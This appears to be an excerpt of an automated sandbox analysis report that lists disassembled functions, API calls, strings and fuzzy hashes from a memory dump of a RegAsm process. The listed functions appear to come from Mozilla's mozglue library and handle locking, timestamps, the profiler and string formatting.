                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71D93C
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C71D948
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C71D970
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71D976
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C71D982
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C71D9CF
                                                                                    • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C71DA2E
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71DA6F
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C71DA78
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6C71DA91
                                                                                      • Part of subcall function 6C6E5C50: GetTickCount64.KERNEL32 ref: 6C6E5D40
                                                                                      • Part of subcall function 6C6E5C50: EnterCriticalSection.KERNEL32(6C74F688), ref: 6C6E5D67
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C71DAB7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionStampTickTimeV01@@Value@mozilla@@Xbad_function_call@std@@
                                                                                    • String ID:
                                                                                    • API String ID: 1195625958-0
                                                                                    • Opcode ID: d66b34990fe97c654536815a8e8713f26e001d2b13eef5abdb5cc64ce8725bb0
                                                                                    • Instruction ID: a3bd0fe96158c45040908a0cbcf4b337e30eac01e029439cb16a685592c9e0c2
                                                                                    • Opcode Fuzzy Hash: d66b34990fe97c654536815a8e8713f26e001d2b13eef5abdb5cc64ce8725bb0
                                                                                    • Instruction Fuzzy Hash: 35718C756043049FCB00DF29C488A9EBBF5FF89318F19857AE85A9B741DB30A944CF95
                                                                                    Function 6C71D4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71D4F0
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C71D4FC
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C71D52A
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71D530
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C71D53F
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C71D55F
                                                                                    • free.MOZGLUE(00000000), ref: 6C71D585
                                                                                    • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C71D5D3
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71D5F9
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C71D605
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C71D652
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71D658
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C71D667
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C71D6A2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                    • String ID:
                                                                                    • API String ID: 2206442479-0
                                                                                    • Opcode ID: 036847fc991d029ee78dac5014e893516ddf79ef205920a6ff4a31580a4eb68e
                                                                                    • Instruction ID: ed743a9d3aa71a2f54acf286d465d6fdb9adbd0d137bec5ba67b7ad28e5c64d7
                                                                                    • Opcode Fuzzy Hash: 036847fc991d029ee78dac5014e893516ddf79ef205920a6ff4a31580a4eb68e
                                                                                    • Instruction Fuzzy Hash: 4A516B71608B05DFC704DF35C488A9ABBB4FF89358F10862EE95A87B11DB30B945CB95
                                                                                    Function 6C6C1E90 Relevance: 19.6, APIs: 9, Strings: 4, Instructions: 120COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6C74E784), ref: 6C6C1EC1
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E784), ref: 6C6C1EE1
                                                                                    • EnterCriticalSection.KERNEL32(6C74E744), ref: 6C6C1F38
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E744), ref: 6C6C1F5C
                                                                                    • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C6C1F83
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E784), ref: 6C6C1FC0
                                                                                    • EnterCriticalSection.KERNEL32(6C74E784), ref: 6C6C1FE2
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E784), ref: 6C6C1FF6
                                                                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C6C2019
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
                                                                                    • String ID: Dtl$Dtl$MOZ_CRASH()$\tl
                                                                                    • API String ID: 2055633661-3369011757
                                                                                    • Opcode ID: aac9c0c255ef872f0fb9210f0180a7a1ed8a1bdefdba3fdcea91ead9d4cc62a6
                                                                                    • Instruction ID: 1c57c27373eb5abb3ccbbab006c56787c9a9ceefc515204ab0bff7d77f3e677e
                                                                                    • Opcode Fuzzy Hash: aac9c0c255ef872f0fb9210f0180a7a1ed8a1bdefdba3fdcea91ead9d4cc62a6
                                                                                    • Instruction Fuzzy Hash: C141D375B043198BDB01EF78C888BAE7AB5EB4A36CF008136E92597741D77098048BDA
                                                                                    Function 6C6E5670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C6E56D1
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6E56E9
                                                                                    • ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C6E56F1
                                                                                    • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C6E5744
                                                                                    • ??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C6E57BC
                                                                                    • GetTickCount64.KERNEL32 ref: 6C6E58CB
                                                                                    • EnterCriticalSection.KERNEL32(6C74F688), ref: 6C6E58F3
                                                                                    • __aulldiv.LIBCMT ref: 6C6E5945
                                                                                    • LeaveCriticalSection.KERNEL32(6C74F688), ref: 6C6E59B2
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C74F638,?,?,?,?), ref: 6C6E59E9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
                                                                                    • String ID: MOZ_APP_RESTART
                                                                                    • API String ID: 2752551254-2657566371
                                                                                    • Opcode ID: bf5fe81da4ac9328b0c1990d27f88234a2b11cbdc5679bdacd30c5a3d2970416
                                                                                    • Instruction ID: 7c5ef53c19e88c689e8a266a4bd1ef59d8ffb1614a7f17b8dd0a82900e5908c4
                                                                                    • Opcode Fuzzy Hash: bf5fe81da4ac9328b0c1990d27f88234a2b11cbdc5679bdacd30c5a3d2970416
                                                                                    • Instruction Fuzzy Hash: 6BC16E31A0D7909FD705DF28C44066AB7F1BFDA718F15CA2EE8C497661D730A885CB86
                                                                                    Function 6C70EC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C6D4A68), ref: 6C70945E
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C709470
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C709482
                                                                                      • Part of subcall function 6C709420: __Init_thread_footer.LIBCMT ref: 6C70949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70EC84
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C70EC8C
                                                                                      • Part of subcall function 6C7094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7094EE
                                                                                      • Part of subcall function 6C7094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C709508
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70ECA1
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70ECAE
                                                                                    • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C70ECC5
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70ED0A
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C70ED19
                                                                                    • CloseHandle.KERNEL32(?), ref: 6C70ED28
                                                                                    • free.MOZGLUE(00000000), ref: 6C70ED2F
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70ED59
                                                                                    Strings
                                                                                    • [I %d/%d] profiler_ensure_started, xrefs: 6C70EC94
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                    • String ID: [I %d/%d] profiler_ensure_started
                                                                                    • API String ID: 4057186437-125001283
                                                                                    • Opcode ID: f00c97e8907704670805d45a7887885aae5b20e7800d1081527216a1d5dea891
                                                                                    • Instruction ID: bd9597307a97e456805fa6d432688136a59072f5944d90b758402495094f08b5
                                                                                    • Opcode Fuzzy Hash: f00c97e8907704670805d45a7887885aae5b20e7800d1081527216a1d5dea891
                                                                                    • Instruction Fuzzy Hash: 0F21F9B57005189BDF00AF68D909EAA77B9EF8636CF108232FC2857741DB31AC05CBA5
                                                                                    Function 6C725FF0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 6C726009
                                                                                    • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C726024
                                                                                    • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(Qll,?), ref: 6C726046
                                                                                    • OutputDebugStringA.KERNEL32(?,Qll,?), ref: 6C726061
                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C726069
                                                                                    • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C726073
                                                                                    • _dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C726082
                                                                                    • _fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6C74148E), ref: 6C726091
                                                                                    • __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,Qll,00000000,?), ref: 6C7260BA
                                                                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C7260C4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
                                                                                    • String ID: Qll
                                                                                    • API String ID: 3835517998-3645837480
                                                                                    • Opcode ID: 0cbae3132ad83a16c64c5f0780f7261416b2ec308f1e46155a70be2c4aac9f58
                                                                                    • Instruction ID: 345247eab794ba21ebb6cd866fc9695f7a50e6e5cdcb6b08ca618d46333d0407
                                                                                    • Opcode Fuzzy Hash: 0cbae3132ad83a16c64c5f0780f7261416b2ec308f1e46155a70be2c4aac9f58
                                                                                    • Instruction Fuzzy Hash: AD21A371A002189FDB206F24DC09AAE7BB8FF45218F00C43AE85A97641DB75AA59CFD5
                                                                                    Function 6C708ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6C6CEB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6CEB83
                                                                                    • ?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C70B392,?,?,00000001), ref: 6C7091F4
                                                                                      • Part of subcall function 6C6FCBE8: GetCurrentProcess.KERNEL32(?,6C6C31A7), ref: 6C6FCBF1
                                                                                      • Part of subcall function 6C6FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6C31A7), ref: 6C6FCBFA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
                                                                                    • String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
                                                                                    • API String ID: 3790164461-3347204862
                                                                                    • Opcode ID: dd2870b5e692835c3f67338620ee1e9cd91cf0529d5b081b5bd7e0c92da64285
                                                                                    • Instruction ID: b770194d89491931d3c1e719a00e4aa25656100ba99146c278ec9577f4e29249
                                                                                    • Opcode Fuzzy Hash: dd2870b5e692835c3f67338620ee1e9cd91cf0529d5b081b5bd7e0c92da64285
                                                                                    • Instruction Fuzzy Hash: C4B1C1B0B012099BDB04CFA4CA567EEBBB6EF95318F108029D405ABF81D771E945CBD5
                                                                                    Function 6C6EC570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6EC5A3
                                                                                    • WideCharToMultiByte.KERNEL32 ref: 6C6EC9EA
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C6EC9FB
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C6ECA12
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6ECA2E
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6ECAA5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWidestrlen$freemalloc
                                                                                    • String ID: (null)$0
                                                                                    • API String ID: 4074790623-38302674
                                                                                    • Opcode ID: ab20a03f8345a0b584e37b351d5155c6e2858e7d4914b854f72fe0141d46a829
                                                                                    • Instruction ID: 2b18056ce524f9fc3b5a4cb4e81fbd4fc2ea4408c0642f9e9974291a89270d58
                                                                                    • Opcode Fuzzy Hash: ab20a03f8345a0b584e37b351d5155c6e2858e7d4914b854f72fe0141d46a829
                                                                                    • Instruction Fuzzy Hash: 29A18D3060E341AFDB10EF28C55475BBBE1BFCA748F04892EE99A97641D731D809CB96
                                                                                    Function 6C6C48E0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 198COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(?,?,6C70483A,?), ref: 6C6C4ACB
                                                                                    • memcpy.VCRUNTIME140(-00000023,?,?,?,?,6C70483A,?), ref: 6C6C4AE0
                                                                                    • moz_xmalloc.MOZGLUE(?,?,6C70483A,?), ref: 6C6C4A82
                                                                                      • Part of subcall function 6C6DCA10: mozalloc_abort.MOZGLUE(?), ref: 6C6DCAA2
                                                                                    • memcpy.VCRUNTIME140(-00000023,?,?,?,?,6C70483A,?), ref: 6C6C4A97
                                                                                    • moz_xmalloc.MOZGLUE(?,?,6C70483A,?), ref: 6C6C4A35
                                                                                      • Part of subcall function 6C6DCA10: malloc.MOZGLUE(?), ref: 6C6DCA26
                                                                                    • memcpy.VCRUNTIME140(-00000023,?,?,?,?,6C70483A,?), ref: 6C6C4A4A
                                                                                    • moz_xmalloc.MOZGLUE(?,?,6C70483A,?), ref: 6C6C4AF4
                                                                                    • moz_xmalloc.MOZGLUE(?,?,6C70483A,?), ref: 6C6C4B10
                                                                                    • moz_xmalloc.MOZGLUE(?,?,6C70483A,?), ref: 6C6C4B2C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
                                                                                    • String ID: :Hpl
                                                                                    • API String ID: 4251373892-2875215652
                                                                                    • Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                                    • Instruction ID: 58cb4c0a4a0a08bb7b37d0dd3a526cf656570b624e11f69bc60b312216d64fc4
                                                                                    • Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                                    • Instruction Fuzzy Hash: DD7147B1A006069FCB54CF68C480ABAB7F5FF09308B10467EE15A9BB41E771F655CB85
                                                                                    Function 6C6EC769 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 159COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6EC784
                                                                                    • _dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6EC801
                                                                                    • _dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6C6EC83D
                                                                                    • ?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C6EC891
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
                                                                                    • String ID: INF$NAN$inf$nan
                                                                                    • API String ID: 1991403756-4166689840
                                                                                    • Opcode ID: b8bd7569a96bf17ff5deb9ba011d39e644ca89a5cf89e57734a29520ccbaa2d5
                                                                                    • Instruction ID: 139688366a6d978f4b2f3170f3c5e0da4dad785cdd4ac947a598269fd761c3ce
                                                                                    • Opcode Fuzzy Hash: b8bd7569a96bf17ff5deb9ba011d39e644ca89a5cf89e57734a29520ccbaa2d5
                                                                                    • Instruction Fuzzy Hash: 34517070A0D7409BD704AF68C58169BFBF0BF9E309F008A2EE9D597650E770D9898B47
                                                                                    Function 6C6C3480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C6C3284,?,?,6C6E56F6), ref: 6C6C3492
                                                                                    • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C6C3284,?,?,6C6E56F6), ref: 6C6C34A9
                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C6C3284,?,?,6C6E56F6), ref: 6C6C34EF
                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C6C350E
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6C3522
                                                                                    • __aulldiv.LIBCMT ref: 6C6C3552
                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C6C3284,?,?,6C6E56F6), ref: 6C6C357C
                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C6C3284,?,?,6C6E56F6), ref: 6C6C3592
                                                                                      • Part of subcall function 6C6FAB89: EnterCriticalSection.KERNEL32(6C74E370,?,?,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284), ref: 6C6FAB94
                                                                                      • Part of subcall function 6C6FAB89: LeaveCriticalSection.KERNEL32(6C74E370,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284,?,?,6C6E56F6), ref: 6C6FABD1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                    • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                    • API String ID: 3634367004-706389432
                                                                                    • Opcode ID: 54420746f5763a12cf10f34f0df22617d56311920d2d329b3862e820b3b2643b
                                                                                    • Instruction ID: 952a426a459e05823fcc4c3347c23e1ef4643409fa7fd8b0d041ac2f46b6e97e
                                                                                    • Opcode Fuzzy Hash: 54420746f5763a12cf10f34f0df22617d56311920d2d329b3862e820b3b2643b
                                                                                    • Instruction Fuzzy Hash: EB31B371B002499BDF00EFB9C948EEE77B9FB86309F50803AE515A3650DB70A905CB66
                                                                                    Function 6C6C4480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
